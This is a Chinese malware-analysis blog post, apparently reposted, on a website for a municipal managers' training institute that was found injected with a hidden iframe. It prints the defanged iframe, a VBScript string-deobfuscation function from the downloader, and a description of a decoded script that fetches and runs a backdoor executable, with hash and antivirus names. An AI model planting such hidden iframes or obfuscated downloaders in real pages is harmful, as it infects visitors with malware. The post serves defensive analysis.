某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
来源:互联网 发布:elite电话营销软件 编辑:程序博客网 时间:2024/05/05 10:15
endurer 原创
2007-05-11 第1版
该网站页面被植入代码:
/---
<iframe src=hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm width=0 height=0></iframe>
---/
hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm(Kaspersky报为:Trojan-Downloader.VBS.Psyme.de)的内容为vbscript脚本,功能是利用自定义函数
/---
function UnEncode(temp)
but=67
for i = 1 to len(temp)
if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
end if
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
---/
解密并输出变量hu的值。
变量hu的值解密输出的是一段vbscript脚本,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 lsass.exe,保存为%temp%/winlogin.exe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。
文件说明符 : D:/test/lsass.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 21:11:27
修改时间 : 2007-5-10 21:11:28
访问时间 : 2007-5-10 0:0:0
大小 : 309760 字节 302.512 KB
MD5 : f71f70cef3c5f71059f042516390262d
瑞星报为 Backdoor.Gpigeon.GEN
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 免费刷会员和六钻工具?小心通过QQ传播的灰鸽子Backdoor.Win32.Gpigeon.gem
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
- 类似灰鸽子的木马的清除 Backdoor.Gpigeon.bhv Backdoor.Gpigeon.cdd
- 职业经理人的生活习惯
- 职业经理人的自我管理
- 又收到关于灰鸽子Backdoor.Gpigeon.uql的问题
- 续:又收到关于灰鸽子Backdoor.Gpigeon.uql的问题
- 一位网友的电脑中了灰鸽子Backdoor.Gpigeon.iir
- 某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
- 我市创办软件高级经理人学院
- 我市成立软件高级经理人学院
- 我的电子书共享站,欢迎大家访问下载经典电子书
- window/linux下C/C++时间函数全攻略
- 内举性cohesion
- 回顾我的ecos自学历程(一)环境安装篇
- Java反射机制__侯捷
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 发布 shawl.qiu Javascript 媒体播放器 sqMusicPlayer v1.0 Final
- 个人网站要想成功,我的四点经验
- sql server日期时间函数
- 详细解析Java中抽象类和接口的区别
- [转]Google开发拼音输入法背后的故事
- 荣耀:C++程序设计之四书五经
- 重大发现!IE竟可以轻松伪造服务器网页!
- 去掉DataSet中重復記錄----好久沒動腦筋了